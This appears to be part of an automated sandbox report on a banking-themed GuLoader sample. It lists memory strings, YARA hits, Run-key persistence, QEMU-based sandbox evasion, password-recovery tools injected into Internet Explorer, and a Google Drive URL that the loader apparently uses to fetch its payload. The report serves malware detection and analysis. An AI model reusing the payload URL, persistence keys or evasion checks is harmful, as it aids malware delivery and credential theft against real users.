Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_004163CD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 17_2_004163CD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00411A64 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle, 17_2_00411A64
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource, 14_2_0041208B
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.81471342102.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.80790209471.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.81650689390.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.81386820299.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.81293484753.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.81498277835.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.81577027857.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.81384924963.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.81467189265.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0040BE02 push cs; ret 0_2_0040BE0F
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_00401194 push esi; iretd 0_2_00401195
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_004063A0 push edi; iretd 0_2_004063A1
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F208A push edi; ret 0_2_022F20B9
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F3C8F pushfd ; retf 0_2_022F3C96
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F21DE push 81EB8925h; ret 0_2_022F21E3
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087510B pushfd ; ret 4_3_0087510C
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087510B pushfd ; ret 4_3_0087510C
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087510B pushfd ; ret 4_3_0087510C
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087510B pushfd ; ret 4_3_0087510C
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE208A push edi; ret 15_2_02BE20B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE3C8F pushfd ; retf 15_2_02BE3C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE21DE push 81EB8925h; ret 15_2_02BE21E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B208A push edi; ret 21_2_006B20B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B3C8F pushfd ; retf 21_2_006B3C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B21DE push 81EB8925h; ret 21_2_006B21E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE208A push edi; ret 22_2_02CE20B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE3C8F pushfd ; retf 22_2_02CE3C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE21DE push 81EB8925h; ret 22_2_02CE21E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056208A push edi; ret 23_2_005620B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00563C8F pushfd ; retf 23_2_00563C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005621DE push 81EB8925h; ret 23_2_005621E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CAC7 push FFFFFFDBh; iretd 25_3_00A9CAD8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CAC7 push FFFFFFDBh; iretd 25_3_00A9CAD8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00404C9D LoadLibraryA,GetProcAddress, 14_2_00404C9D

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Jump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 Jump to behavior
Creates autostart registry keys with suspicious names
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 16_2_0040F64B
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\Statement from QNB.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: ILES\QEMU-GA\QEMU-GA.EXE
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81296329023.0000000000684000.00000004.00000020.sdmp Binary or memory string: \QEMU-GA\QEMU-GA.EXE]
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: \QEMU-GA.EXE
Source: Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1YZH40PNS32XIEWW_X1KB4GXHZIPD-FNP
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 17_2_00408B60
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230377C rdtsc 0_2_0230377C
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Statement from QNB.exe Window / User API: threadDelayed 9995 Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00416A80 memset,GetSystemInfo, 17_2_00416A80
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00406EC3
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen, 17_2_00408752
